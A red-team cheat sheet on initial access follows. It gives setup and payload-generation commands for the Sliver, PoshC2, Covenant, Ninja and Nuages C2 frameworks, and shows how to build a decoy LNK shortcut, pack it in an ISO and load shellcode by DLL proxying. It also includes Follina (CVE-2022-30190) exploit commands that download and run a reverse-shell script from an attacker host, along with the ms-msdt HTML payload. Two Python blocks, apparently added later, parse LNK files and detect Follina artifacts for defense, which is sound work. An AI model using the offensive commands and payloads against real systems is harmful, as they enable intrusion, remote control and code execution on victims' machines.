# Initial Access

## 01. C2 Frameworks

### 01.1 Sliver

```bash
## ------------------| Setup
sudo apt install git mingw-w64
curl https://sliver.sh/install|sudo bash
systemctl status sliver

## ------------------| Create Payload (Session Mode)
### from mTLS
sliver > generate --mtls attacker.com:443 --save payload.exe
### from WireGuard
sliver > generate --wg attacker.com:443 --save payload.exe
### from HTTP
sliver > generate --http attacker.com:443 --save payload.exe
### from DNS
sliver > generate --dns attacker.com:443 --save payload.exe

## ------------------| Create Payload (Beacon Mode)
sliver > generate beacon --mtls attacker.com:443 --save beacon.exe

## ------------------| Generate for target OS
sliver > generate --mtls example.com --save /Users/moloch/Desktop --os mac
```

### [01.2 PoshC2](https://github.com/nettitude/PoshC2)

```bash
## ------------------| Install
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash

## ------------------| Create a new project
posh-project -n <project-name>

## ------------------| Projects can be switched to or listed using this script
[*] Usage: posh-project -n <new-project-name>
[*] Usage: posh-project -s <project-to-switch-to>
[*] Usage: posh-project -l (lists projects)
[*] Usage: posh-project -d <project-to-delete>
[*] Usage: posh-project -c (shows current project)

## ------------------| Edit the configuration for your project
posh-config

## ------------------| Launch the PoshC2 server
posh-server

## ------------------| Alternatively start it as a service
posh-service
```

### [01.3 Covenant](https://github.com/cobbr/Covenant)

```bash
## ------------------| Install
git clone --recurse-submodules https://github.com/cobbr/Covenant && cd Covenant/Covenant
dotnet run
```

### [01.4 NinjaC2](https://github.com/ahmedkhlief/Ninja/)

```bash
## ------------------| Install
git clone https://github.com/ahmedkhlief/Ninja/ && cd Ninja
chmod +x ./install.sh
sudo ./install.sh
python3 start_campaign.py
python3 Ninja.py

## ------------------| Folder Structure
###   agents/     : contains all the raw agents required by Ninja.
###   core/       : contains all the core scripts to run Ninja.
###   DA/         : Defense Analysis script will write its output here.
###   downloads/  : all the files downloaded from the victim will be here.
###   file/       : files to be uploaded to the victim.
###   images/     : screenshots will be uploaded here.
###   kerberoast/ : kerberoast module will write its output here.
###   lib/        : include library used by Ninja C2.
###   Modules/    : PowerShell modules that can be loaded on the victim.
###   payloads/   : payloads ready to be used in the campaign.
###   ninja.py    : C2 main script.
###   start_campaign.py : python script to initialize the configuration for the campaign.
###   links.txt   : file containing words to be used in the callback links.
###   install.sh  : bash script to install the required
###   c2-logs.txt : logs all commands with their results.
```

### [01.5 Nuages](https://github.com/p3nt4/Nuages)

```bash
## ------------------| Install
git clone https://github.com/p3nt4/Nuages
cd Nuages/Server/
bash setup.sh
bash start.sh
```

## 02. Delivery and Execution

### 02.1 Generate Payloads

* Create LNK file

```powershell
## ------------------| Setup
$obj = New-object -comobject wscript.shell
$link = $obj.createshortcut("c:\<filepath>\<filename>.lnk") # Changeme!
$link.windowstyle = "7"
$link.targetpath = "%windir%/system32/cmd.exe"
$link.iconlocation = "C:\Program Files (x86)\Windows NT\Accessories\WordPad.exe"
$link.arguments = "/c start OneDriveStandaloneUpdater.exe"
$link.save()
```
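As an added defender-side example (not part of the original page), the Python below parses the ShellLinkHeader and StringData of a .lnk and flags the traits the shortcut above has: ShowCommand 7 (minimized, not activated), a `cmd.exe /c` launch, and an icon borrowed from WordPad. The sample shortcut bytes are constructed in code to mirror the snippet; shortcuts written by WScript also carry an IDList and LinkInfo, which the parser skips over rather than decodes.

```python
import struct

HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x1, 0x2, 0x4, 0x8   # LinkFlags (MS-SHLLINK)
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7                      # the windowstyle the snippet above sets
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

def parse_lnk(data: bytes) -> dict:
    """Read ShowCommand and the StringData of a .lnk (IDList/LinkInfo are skipped over)."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags, = struct.unpack_from("<I", data, 0x14)
    show_cmd, = struct.unpack_from("<I", data, 0x3C)
    pos = 0x4C
    if flags & HAS_ID_LIST:                 # IDListSize (2 bytes) + item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:               # LinkInfoSize counts the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"show_command": show_cmd}
    width = 2 if flags & IS_UNICODE else 1
    for bit, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                     (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                     (HAS_ICON, "icon_location")):
        if flags & bit:                     # CountCharacters (2 bytes) + characters
            count = struct.unpack_from("<H", data, pos)[0] * width
            info[key] = data[pos + 2:pos + 2 + count].decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count
    return info

def lnk_findings(info: dict) -> list:
    """Flag the traits of the decoy shortcut built above: hidden window, cmd /c, borrowed icon."""
    launched = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    icon = info.get("icon_location", "").lower().rsplit("\\", 1)[-1]
    findings = []
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window minimized and not activated (ShowCommand=7)")
    if "cmd.exe" in launched and "/c" in launched:
        findings.append("runs cmd.exe /c: " + info.get("arguments", ""))
    if icon and icon not in launched:
        findings.append("icon taken from a program it does not launch: " + icon)
    return findings

def build_sample_lnk() -> bytes:  # constructed sample mirroring the snippet above, no IDList/LinkInfo
    flags = HAS_REL_PATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    s = lambda t: struct.pack("<H", len(t)) + t.encode("utf-16-le")
    return (header + s(r"..\..\..\Windows\System32\cmd.exe") + s("/c start OneDriveStandaloneUpdater.exe")
            + s(r"C:\Program Files (x86)\Windows NT\Accessories\WordPad.exe"))
```

Run `lnk_findings(parse_lnk(open(path, "rb").read()))` over a quarantined attachment to get the three findings above for this pattern.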

* Packed as ISO

```bash
git clone https://github.com/mgeeky/PackMyPayload && cd PackMyPayload
pip3 install -r requirements.txt
python PackMyPayload.py c:\<filepath>\ c:\<filepath>\<filename>.iso --out-format iso --hide file1,file2
```

### 02.2 [DLL Proxy Loading](https://redteaming.co.uk/2020/07/12/dll-proxy-loading-your-favorite-c-implant/)

```bash
## ------------------| Find a legitimate program whose DLL can be hijacked
## Find a suitable binary from https://ninite.com
## For example I will use OneDriveStandaloneUpdater.exe as below
copy %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe OneDriveUpdater.exe
## 64-bit DLL (System32 holds the 64-bit copies on 64-bit Windows)
copy "C:\Windows\System32\version.dll" version-org.dll
## 32-bit DLL (SysWOW64 holds the 32-bit copies)
copy "C:\Windows\SysWOW64\version.dll" version-org.dll

## ------------------| Crafting the proxy payload
### Create a simple payload bin
msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="Proxy Loading worked" -f raw > shellcode.bin
### Download the repo below and compile it
https://github.com/Flangvik/SharpDllProxy
### Copy version-org.dll and shellcode.bin into the SharpDllProxy folder
.\SharpDllProxy.exe --dll version-org.dll --payload shellcode.bin
### Open Visual Studio and create a new project -> select C++ -> "Dynamic-link Library (DLL)" template
### The name of the solution should match the original DLL name
### Copy and paste the full content of output_<DLLNAME>/<DLLNAME>_pragma.c into the .cpp file

## https://h4rithd.com/blog/dll-proxy-loading/index.html
```

## 03. Other

### 03.1 MS-MSDT Follina \[[CVE-2022-30190](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190)]

* Source:
  * <https://github.com/chvancooten/follina.py.git>
  * <https://github.com/JohnHammond/msdt-follina>
  * <https://github.com/JMousqueton/PoC-CVE-2022-30190>
* Exploit

```bash
## ------------------| JohnHammond
git clone https://github.com/JohnHammond/msdt-follina
python3 follina.py -o exploit.doc -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')" 

## ------------------| chvancooten
git clone https://github.com/chvancooten/follina.py
## Execute a local binary
python3 follina.py -t docx -m binary -b \windows\system32\calc.exe
## On linux you may have to escape backslashes
python3 follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe
## RevShell
python3 follina.py -t rtf -m command -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
```

* Scheme

```html
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>
</body>
</html>
```
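Added triage example, not from the original page or from any of the PoC repositories above: it finds `ms-msdt:` URIs in HTML/RTF text, pulls out the injected `IT_*` parameters (the `$(...)` sub-expression and `/../` traversal inside IT_BrowseForFile), and lists external oleObject relationships in a .docx, which is the link through which the document fetches the HTML. The docx target URL and the HTML sample are constructed placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MSDT_URI = re.compile(r"ms-msdt:[^\r\n]+", re.IGNORECASE)
PARAM = re.compile(r"(IT_\w+)=(\S*)")
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def scan_msdt_uris(text: str) -> list:
    """Return one finding per ms-msdt: URI in HTML/RTF text, with the injected IT_* parameters."""
    findings = []
    for m in MSDT_URI.finditer(text):
        params = dict(PARAM.findall(m.group(0)))
        browse = params.get("IT_BrowseForFile", "")
        findings.append({
            "pcw_diagnostic": "PCWDiagnostic" in m.group(0),
            "inline_expression": "$(" in browse,      # PowerShell sub-expression inside the path
            "traversal": "/../" in browse,
            "params": params,
        })
    return findings

def external_ole_targets(docx: bytes) -> list:
    """List oleObject relationships pointing outside the package (the .docx side of the chain)."""
    targets = []
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        for name in z.namelist():
            if name.endswith(".rels"):
                for rel in ET.fromstring(z.read(name)).iter(REL_NS + "Relationship"):
                    if rel.get("TargetMode") == "External" and rel.get("Type", "").endswith("/oleObject"):
                        targets.append(rel.get("Target"))
    return targets

def build_sample_docx(target: str) -> bytes:
    """Constructed minimal package with a single external oleObject relationship (not a real document)."""
    rels = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId5" TargetMode="External" Target="%s" Type="http://schemas.'
            'openxmlformats.org/officeDocument/2006/relationships/oleObject"/></Relationships>' % target)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()

# Constructed HTML carrying the scheme from the block above (a string, not a served page)
SAMPLE_HTML = ('<script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
               '\\"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed '
               'IT_BrowseForFile=h$(IEX(\'calc.exe\'))i/../../../../Windows/System32/mpsigstub.exe \\"";</script>')
```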
